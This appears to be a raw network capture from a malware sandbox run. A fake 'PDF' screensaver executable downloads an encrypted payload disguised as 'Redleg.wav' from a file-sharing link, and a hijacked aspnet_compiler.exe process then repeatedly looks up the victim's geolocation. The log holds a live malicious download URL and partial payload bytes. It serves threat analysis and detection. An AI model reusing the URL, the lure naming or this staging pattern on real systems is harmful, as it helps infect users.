2024-10-28 12:47:03 UTC	1242	IN	HTTP/1.1 302 Found Date: Mon, 28 Oct 2024 12:47:03 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Powered-By: Nette Framework 3 X-Frame-Options: SAMEORIGIN Set-Cookie: nette-samesite=1; path=/; SameSite=Strict; HttpOnly Set-Cookie: PHPSESSID=06e2fgk0rk2s3vnql4oglqf2t6; expires=Mon, 11-Nov-2024 12:47:03 GMT; Max-Age=1209600; path=/; SameSite=Lax; secure; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: X-Requested-With Location: https://s23.filetransfer.io/storage/download/gxyOEP84bSEs cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6LFPWGSyaoOTfZxOsF7ZqeOTOiXW4lbxtFctUEYlBQLbO9cmvt6dTx2FDofGU%2FNQ0VCBE54LDt9LNHgEXJZreA5mf%2FdGQJs%2FEZBP8LnJ95OQfQX9PLrjpnitI3Pa1TMeUA8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9b0839d8336c3b-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1828&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=709&delivery_rate=1609783&cwnd=251&unsent_bytes=0&cid=62fa1be2cf15d5a3&ts=1185&x=0"
2024-10-28 12:47:03 UTC	134	IN	Data Raw: 38 30 0d 0a 3c 68 31 3e 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 0a 0a 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 33 2e 66 69 6c 65 74 72 61 6e 73 66 65 72 2e 69 6f 2f 73 74 6f 72 61 67 65 2f 64 6f 77 6e 6c 6f 61 64 2f 67 78 79 4f 45 50 38 34 62 53 45 73 22 3e 50 6c 65 61 73 65 20 63 6c 69 63 6b 20 68 65 72 65 20 74 6f 20 63 6f 6e 74 69 6e 75 65 3c 2f 61 3e 2e 3c 2f 70 3e 0d 0a Data Ascii: 80<h1>Redirect</h1><p><a href="https://s23.filetransfer.io/storage/download/gxyOEP84bSEs">Please click here to continue</a>.</p>
2024-10-28 12:47:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	188.114.96.3	443	3244	C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 12:47:04 UTC	98	OUT	GET /storage/download/gxyOEP84bSEs HTTP/1.1 Host: s23.filetransfer.io Connection: Keep-Alive
2024-10-28 12:47:13 UTC	1244	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 12:47:13 GMT Content-Type: application/octet-stream Content-Length: 1055240 Connection: close Last-Modified: Mon, 28 Oct 2024 06:02:15 GMT Set-Cookie: nette-samesite=1; path=/; SameSite=Strict; HttpOnly Set-Cookie: PHPSESSID=218358139fd374f1921252479e30cd41; expires=Mon, 11-Nov-2024 12:47:12 GMT; Max-Age=1209600; path=/; SameSite=Lax; secure; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Disposition: attachment; filename="Redleg.wav" Accept-Ranges: bytes Accept-Ranges: bytes ETag: "671f28e7-101a08" cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nR6uULJ6tY%2B0Qi5oTpdOHLHkIhzvTFnfGeu1g3R1rAPvAE1I43s7MTv6eXJ3n4F1vUOuHex%2B%2FXRcueytzjRVw1WlQHIZ0ofsSDEigQ2UxiPilK1dcss%2BEHUXlfkGFJV83mk3BIKG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9b08444cab3172-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1517&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=712&delivery_rate=1839898&cwnd=231&unsent_bytes=0&cid=bbe861cb2c4186e8&ts=9052&x=0"
2024-10-28 12:47:13 UTC	125	IN	Data Raw: 17 da 95 09 44 eb 4f 17 20 a7 7a b8 62 30 3e 59 2d eb c3 d5 b6 ea bb b9 bc 37 ce ab 7a 33 c6 aa 5f 73 cd 4a ce 9a 7e 9c c5 5a 60 78 12 c4 06 92 61 89 15 a3 70 06 5b b1 f6 69 29 c3 33 ab 86 11 8c a3 85 f0 a2 d3 3c d0 2d a2 5f 10 7a c0 98 ec 87 fc 21 eb d0 8e 8a 64 c9 86 bb 9e 82 94 ef fc 9f 72 0c 4c f4 60 a2 ae ea 60 75 7e f2 65 5c 18 d8 6f 72 9a e5 b2 d0 62 10 96 9a 80 5b Data Ascii: DO zb0>Y-7z3_sJ~Z`xap[i)3<-_z!drL``u~e\orb[
2024-10-28 12:47:13 UTC	1369	IN	Data Raw: 1b e5 50 12 d5 69 18 22 65 71 8a b8 50 97 82 30 ed 19 bd 30 ba 3e ce d4 75 32 21 a1 23 ea 13 38 10 08 b8 2d 9a 86 2c 74 fa a8 67 42 b6 53 4b 4d 52 67 35 92 82 ae 09 bd ce 8b e4 55 20 8d 6d a0 34 9d a3 86 cd c1 f8 42 fb 51 09 02 f7 5a f6 d5 d6 f6 bd 35 02 aa c0 08 85 9d 71 38 fe f1 55 e5 73 56 4d b5 f7 20 98 8b b4 49 8e 51 23 f3 6e 7e 13 73 63 d6 2a fb 1a 16 b8 53 7e f6 98 28 13 cd 83 d0 d1 45 69 66 6e 5a 2c e0 d8 5e 09 69 21 4a 66 a3 fd 5c 5e 03 19 aa b3 df b4 cf ca 4b 31 d6 c6 f4 20 d9 2c 14 a6 78 ac 48 25 43 26 ff e8 28 f6 b4 dd cf 6b 4e 7a 01 e4 da ff 96 14 e4 57 91 87 28 0b 66 6c 27 f0 2e 88 37 77 97 22 7b 2e 73 b7 7b 8a 54 69 71 ab d6 ba ed 14 58 3d 3e 3c 65 14 4d 87 9c b2 7c 17 11 07 e5 31 97 8b 9b ea e4 df 37 d8 59 d9 ca 34 cd 1f e3 04 9c 54 53 b2 Data Ascii: Pi"eqP00>u2!#8-,tgBSKMRg5U m4BQZ5q8UsVM IQ#n~sc*S~(EifnZ,^i!Jf\^K1 ,xH%C&(kNzW(fl'.7w"{.s{TiqX=><eM\|17Y4TS
2024-10-28 12:47:13 UTC	1369	IN	Data Raw: 76 46 37 2d 54 ca 45 0f 93 1b 51 4a aa eb 8f 50 a0 93 4f 9f fd ce 6c 75 b2 91 84 f0 d4 e7 f1 38 44 3e a1 80 af 40 b5 cf 78 0a 51 76 a4 e9 a8 f2 d4 cf 37 82 28 f4 5f 05 1c 37 17 f9 7c 9b 64 b1 f4 15 21 c0 8b 11 f6 a0 b5 5e 38 38 b1 01 78 c1 3e 52 ab 4a a3 ba a8 4a 92 b5 da 03 57 ff ba 15 e7 34 33 a3 cd b2 f8 da 12 cd 44 f7 e0 ae 9f 7f f1 4d 03 0b 12 6a 4b a8 2f 24 e2 a3 43 2f 05 9c 74 c3 fd cf f2 ca c6 fc 0e ff b7 57 a8 57 98 c5 be 81 d4 b3 03 51 a9 f7 d6 d4 32 78 b6 5c 01 e9 ce 42 d5 38 3e 43 ff b5 04 d3 95 b5 ba 5f 93 20 b0 d7 b4 42 68 92 13 ef 82 6d 13 59 65 26 cb ab b9 d2 31 43 7d f2 74 2e 4b 29 56 fc 4e 08 37 8c 95 7d 7e 54 ed 1a 49 48 b7 d2 65 e9 2b 0c 76 f0 28 94 6e bc 65 50 11 14 b3 d2 88 b8 45 01 c3 88 21 7f d6 e2 16 7e 61 90 0a 93 df db 3c 4f d1 Data Ascii: vF7-TEQJPOlu8D>@xQv7(_7\|d!^88x>RJJW43DMjK/$C/tWWQ2x\B8>C_ BhmYe&1C}t.K)VN7}~TIHe+v(nePE!~a<O
2024-10-28 12:47:13 UTC	1369	IN	Data Raw: f8 1d cf 79 85 a7 33 20 d1 cd b4 27 e8 fb ee 16 f3 52 06 c3 17 53 05 02 fb a6 1d 31 3c 93 e5 89 c3 a9 f3 49 d0 38 3f 5a 3b 9d 9e bf 34 08 2d f1 61 20 d7 c6 90 0f 07 bb 4d bf ea fe 79 6d 70 53 e1 03 2d a8 de 0b 68 d7 a7 2c 94 62 0a da ec f1 24 4d 06 e7 44 a7 37 12 4b e7 bf 62 0b 93 96 ea ba 7a be 86 e3 91 2b 69 6f b7 a6 b6 37 25 73 90 9b 3a 69 23 98 8a 74 5d 1d 1d b4 dc a5 1b ef 71 d1 49 01 d9 a6 6b 78 df 0a c9 be 30 09 82 8d d5 c4 e1 a2 e6 9c 03 b3 e6 3a b9 1c 1e e8 26 4c f6 59 02 3d 35 0f 37 a1 0a 7a 09 1d 08 f4 eb 24 8c 9f cd ea 70 69 af 39 76 cd 64 50 d7 f5 99 66 32 fb fe 46 4c 2b d3 f5 35 71 18 f2 3f 35 99 26 f5 44 45 7f f3 47 3b b0 28 8a b1 72 95 35 0f e0 a3 7c 2f e9 16 b0 90 72 9d 49 52 5c 03 9d 42 7c 41 a5 29 b2 fa 98 6e 1a 61 38 8c d9 67 1f a5 0d Data Ascii: y3 'RS1<I8?Z;4-a MympS-h,b$MD7Kbz+io7%s:i#t]qIkx0:&LY=57z$pi9vdPf2FL+5q?5&DEG;(r5\|/rIR\B\|A)na8g
2024-10-28 12:47:13 UTC	1369	IN	Data Raw: 70 80 e8 fa 3b 9a d3 da 68 3d f2 87 e5 a9 95 a5 c2 fa 62 e2 29 0e 69 85 0c 37 72 5c c4 90 01 79 5f 54 f3 6f f7 83 ea 93 3b cc b8 85 7b 7c 17 3c 90 da 90 69 1a fb f1 f4 71 bc 89 05 85 3e 7e 7f f3 83 bc 04 c4 2b 6f b0 c6 02 9f 48 e0 75 94 33 9e ee 86 9f 29 f9 eb 69 3b 14 de c4 03 bc 48 49 da 09 98 96 a7 f4 05 21 10 af c4 60 30 aa d2 de 9a e4 59 2e 0a f0 68 2f da ce 98 dc 49 d6 9c b6 e5 19 ef b2 4f ad d3 d4 60 12 71 d5 50 45 ab de 7f 62 f8 35 3a 68 71 e2 c5 ad 39 d5 57 3d f2 56 2e b5 c1 20 82 d3 90 13 3f 63 15 9a eb be 57 9e 3a 21 75 d0 04 29 cb e6 ba 10 3c c8 cb de c5 5a 4a 57 07 eb 2d 1e bd 58 5d df b3 ca 63 31 a5 bf 3e 7d 16 47 01 91 ce 0e cd 6e ef 9b 25 7e 09 69 fd 61 88 84 a6 a1 15 65 18 68 98 84 98 01 94 79 78 67 61 93 87 1e 15 52 ff 15 be 25 c9 f8 c3 Data Ascii: p;h=b)i7r\y_To;{\|<iq>~+oHu3)i;HI!`0Y.h/IO`qPEb5:hq9W=V. ?cW:!u)<ZJW-X]c1>}Gn%~iaehyxgaR%
2024-10-28 12:47:13 UTC	1369	IN	Data Raw: 54 14 a2 74 c4 06 a7 fa a6 b6 dd 0e 19 66 c7 69 44 6e 57 c7 d8 86 dd 1a 87 50 6b 0d d0 40 df 53 21 ed 72 66 52 62 8a b9 d2 e1 dd 17 0b 9e e3 36 e4 79 09 e8 6b 72 55 21 6a b6 d2 f8 83 69 6a 4a 6f dc d8 a5 ae 78 09 3a 95 e9 5c c0 7f eb 41 0e 0a 96 40 41 ae b7 8c 71 d6 3d f4 ef 0a 92 52 35 75 d5 61 da 2a 61 f1 3d 6f 74 e4 2e ba 9e 19 27 80 20 3a b1 a5 9f 8a 1c 6f 32 36 b9 ef 32 75 a3 91 27 92 5e d3 16 37 7e 9f 03 e8 6a ec 29 c1 2d ef bf 8a 24 e9 29 88 dc c2 ac 64 88 e2 bd e9 30 25 e1 b4 bb 83 2d 78 25 df a8 22 d2 f0 42 e0 8e 85 cf ae ea 31 87 87 38 01 e9 5f 96 6f 41 b3 0a 30 63 5e f4 e1 a5 fe c5 9f 54 5f 2f fd cf 78 77 ff c7 e6 55 f0 18 a7 ab 2e 43 bb 92 be e7 e6 a9 16 34 3c f4 f1 2d 2b be 7e b5 98 c7 aa ca 11 c3 6f 8b b9 0d cb 14 38 ee 48 72 0f 80 2f d1 2e Data Ascii: TtfiDnWPk@S!rfRb6ykrU!jijJox:\A@Aq=R5ua*a=ot.' :o262u'^7~j)-$)d0%-x%"B18_oA0c^T_/xwU.C4<-+~o8Hr/.
2024-10-28 12:47:13 UTC	1369	IN	Data Raw: 55 dd 0e fc e9 4e b8 68 70 62 17 c9 69 78 c1 97 67 f6 f0 1a f6 c7 e9 22 f2 d0 bf db 42 76 f7 3f 08 77 16 66 46 44 35 3c 3b ee b6 fe 76 72 ab c7 67 aa 68 bc c3 e9 f6 ca b0 5f 62 be 47 90 b2 8b b6 5a 64 66 8f da 00 69 c2 ce 7d e7 9c 99 ac 47 82 2c 80 04 1d 6c fb 19 14 7b eb a5 23 4f 7a fb d8 1f f8 b5 76 a3 e1 34 81 19 e4 46 3e 7f 44 94 09 a8 d8 9a 81 4e 90 94 3c d4 b2 b2 9b 25 f7 eb 1a 76 5f ea 66 ec 4d cc 1c 2c 0c d1 6c 6e bc 1a 79 53 4f d4 36 24 e3 0e e3 5b 96 50 42 9e 26 67 c2 ed b4 85 18 70 d6 f7 0c af 7b dd 81 31 47 99 d2 5b a0 57 1b 07 f2 a7 fa fe 03 61 b0 43 e4 44 a1 1b ef fc c7 60 b0 60 ab f8 44 71 18 b7 06 84 2d da 47 3b 8b 79 42 f6 91 50 a9 f5 a4 6f d1 5e cd ba a7 d2 8c f6 a5 25 00 ce 91 3a b5 fd a0 12 6a 24 44 f6 46 08 b5 a1 4f 55 26 28 31 1e 97 Data Ascii: UNhpbixg"Bv?wfFD5<;vrgh_bGZdfi}G,l{#Ozv4F>DN<%v_fM,lnySO6$[PB&gp{1G[WaCD``Dq-G;yBPo^%:j$DFOU&(1
2024-10-28 12:47:13 UTC	1369	IN	Data Raw: 79 77 7f 21 b8 7a a7 5c 30 49 69 03 27 77 39 3b 28 34 99 7f e3 94 63 d9 df 1a 2b 2c 0e 9d f2 f5 47 da 64 c0 c4 de 2b d0 4e 29 33 cb dd 05 2b 6e aa a5 4c 28 97 c7 99 7e 83 1a ae ca 67 d0 95 0b 60 08 07 f9 72 67 03 aa 83 aa 3d 47 7f df 2f 5a c1 93 9a 21 a7 6b b8 dd bb d6 d5 00 a8 44 69 2c 54 43 34 23 df 43 3a 87 89 5f 42 b3 a6 42 14 87 9d 85 14 46 72 43 50 4c e2 6b 31 7a 33 69 e9 01 3a 15 12 48 ca 6a 1a 32 5c f3 e8 ef f3 64 ab 70 f6 cd dc c7 9c 87 9a fd 53 c4 58 6b a6 84 a4 41 7b d5 a9 99 c5 c4 a3 d9 5a 25 ec 5d e9 f0 e4 ee 67 17 6e 0d 21 75 76 a8 fa eb 14 19 8f b4 52 34 25 12 2d 68 ec 8d 50 99 af ae d2 1a 79 ec 06 b2 e7 02 58 3e 51 fc d8 9e 3d d7 c2 1d da 89 4b 01 f2 9e e2 f2 8b 11 ae 42 fb 61 d6 db 60 96 ce 01 72 c2 e9 aa 6b 0d b3 eb 43 4d cd 22 93 0c 16 Data Ascii: yw!z\0Ii'w9;(4c+,Gd+N)3+nL(~g`rg=G/Z!kDi,TC4#C:_BBFrCPLk1z3i:Hj2\dpSXkA{Z%]gn!uvR4%-hPyX>Q=KBa`rkCM"
2024-10-28 12:47:13 UTC	1369	IN	Data Raw: 55 4a c5 c5 78 1e 97 87 a1 2d 3f 81 b6 cd 7c e6 0a 6f 76 7e 06 68 27 57 6e 1c e5 d6 83 67 b9 b1 be a6 18 9a f3 52 a6 1c f6 26 f6 47 44 9e 6e 7c dc 6a 91 54 90 ec b2 45 79 9e 2f c3 49 53 98 c8 c4 56 f1 ea 2b 5f f3 83 7a 1b d9 d4 44 f4 38 9a 4b 05 88 cc 6d f0 ec 14 38 ae fa b0 50 2e 2e 3b e2 ea 32 0f c1 66 74 9a fd f2 ad bc 29 ce ab b2 7a 23 2e 78 66 ed 5b 94 4c e4 3b 6c cc fe b1 d0 94 87 39 c1 7c 28 99 af 1a 54 b3 11 5b 2c 79 63 f3 f4 9a 39 fa b4 4f b0 a0 3d e8 c7 16 7a be 87 34 8a c1 4a 8c ce 9a 83 4d 24 1e 28 9d cb 2a b1 19 22 2a 42 e4 2f 8a 13 10 fa 7d 79 82 4c b4 28 b3 99 30 36 fa 14 4d eb 2d 36 69 45 c7 48 67 6a 86 22 25 a9 ed 55 f4 e3 83 62 22 96 83 d0 c5 a2 7e fc f2 37 1d d8 37 9d 2f cf f5 0e c7 ad 37 40 ff 03 c5 67 47 f5 28 63 2b e9 33 e0 57 28 f1 Data Ascii: UJx-?\|ov~h'WngR&GDn\|jTEy/ISV+_zD8Km8P..;2ft)z#.xf[L;l9\|(T[,yc9O=z4JM$("B/}yL(06M-6iEHgj"%Ub"~77/7@gG(c+3W(
2024-10-28 12:47:13 UTC	1369	IN	Data Raw: 08 d6 97 7a 1e 4f 64 b8 09 73 0d b8 c3 c8 c7 5d 66 d9 ea 89 81 fe 5f 3c 93 82 a6 32 9d 62 3b 35 65 f0 bb b5 89 00 7a bb 3d 39 e7 f8 0c eb fb 7c 16 2e 59 4b b4 65 6f 59 8d 4c ba 45 9d 22 b3 91 2e 14 bd 91 be ab 97 da b3 50 45 01 e7 c1 e0 96 60 60 90 a8 00 ba 8c f7 75 08 92 32 4e dc 05 e2 c8 0c 7c fc 24 43 39 42 63 e6 a0 87 27 8d 43 8d dd 06 c7 83 04 cb cb a8 91 aa d1 48 03 ff cd ea 11 38 df 36 6d 1d 3b 5c 4b 51 a1 be ee a8 7d 00 02 f5 4f 07 14 c1 1e fa 44 99 d3 36 39 61 c8 74 ea 71 16 2a 4a b4 06 b8 53 07 0e 1a fd 15 0f f2 ee 71 eb 5d 7d 2c 3a 5d d7 26 05 83 b7 c9 94 96 ee 6d 13 0d 9b 0e b4 0e 83 61 44 b4 7a c8 10 3d df 30 b0 6b 60 98 b9 73 97 04 d6 50 46 79 20 28 d5 1d 6c f8 de ca d0 82 5c b7 4d 89 ed 08 ce e9 67 c2 13 1d 61 dc e3 7d f4 53 ab e3 53 a1 22 Data Ascii: zOds]f_<2b;5ez=9\|.YKeoYLE".PE``u2N\|$C9Bc'CH86m;\KQ}OD69atq*JSq]},:]&maDz=0k`sPFy (l\Mga}SS"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49778	188.114.96.3	443	6012	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 12:48:04 UTC	87	OUT	GET /xml/155.94.241.188 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-28 12:48:04 UTC	888	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 12:48:04 GMT Content-Type: text/xml Content-Length: 358 Connection: close apigw-requestid: AVhc-iOyPHcEJSw= Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 42315 Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=khkTfN%2F%2Fe1EC7QGwHVexsj%2BzLmZV%2Bpr1KJI8%2BZ7hkoQ0xzA3tzHRGSVQxToiDLi6NU3%2FdLw7CsmkuVAROhTYWwOBsi4PZEFAd9TfRX7A4N1p0Mn2Evpn0p3VhnrbKbQzdiXtfIEy"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9b09bae8d0e5c6-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1315&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2571936&cwnd=250&unsent_bytes=0&cid=7e8f4f0d4a5980cf&ts=227&x=0"
2024-10-28 12:48:04 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49787	188.114.96.3	443	6012	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 12:48:05 UTC	63	OUT	GET /xml/155.94.241.188 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-28 12:48:05 UTC	880	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 12:48:05 GMT Content-Type: text/xml Content-Length: 358 Connection: close apigw-requestid: AVhc-iOyPHcEJSw= Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 42316 Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xAJRTgmJMn1hAZoFYtr3PQE5f57uwl1hSn%2Fz0Nc8JHHbGlbrChD3vCRgEpIWofCXskUzozmf7focbezKQAVBkT3vUtifMDGkkCW31fXrGYzdYh%2FkDyth6TlBQgQAO3fZIvWnOdZX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9b09c0b88645fc-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1707&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1691588&cwnd=251&unsent_bytes=0&cid=c944719686e30645&ts=161&x=0"
2024-10-28 12:48:05 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49795	188.114.96.3	443	6012	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 12:48:06 UTC	87	OUT	GET /xml/155.94.241.188 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-28 12:48:06 UTC	890	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 12:48:06 GMT Content-Type: text/xml Content-Length: 358 Connection: close apigw-requestid: AVhc-iOyPHcEJSw= Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 42317 Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nSsGjrZNKEtkhz8wRBtfqAy%2FE2GGyBI5ZLzJgVX%2FK7FW1JWrIElQx1j%2F%2BrAa0VrENN2F8wZDt9K%2F334R8ItD15ZgtUOd%2B%2FrtPdfM1ZKzPmLgyqW4PqqZfPxDD4qip2rIIlqnQnqs"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9b09c9d95ee9a9-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1320&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2112326&cwnd=248&unsent_bytes=0&cid=929c5d96f57f7996&ts=169&x=0"
2024-10-28 12:48:06 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49807	188.114.96.3	443	6012	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 12:48:08 UTC	87	OUT	GET /xml/155.94.241.188 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-28 12:48:08 UTC	891	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 12:48:08 GMT Content-Type: text/xml Content-Length: 358 Connection: close apigw-requestid: AVhc-iOyPHcEJSw= Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 42319 Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mp4BR4%2BxKDqXNJdjqW7QF%2FIRL%2B5M%2FV4aWgazmTw1M%2BI%2BkxZVcbJT8O04NRNuAR%2B4uxG85TC6xJqa%2BKwTygwF3Gh0GDZuv8rxBZ6kpKIGvuLYkdNtFRIuKXcRQ4zre42J2d1O59tK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9b09d2cb63c86f-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1603&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1624228&cwnd=77&unsent_bytes=0&cid=ff3d9c637c69554c&ts=153&x=0"
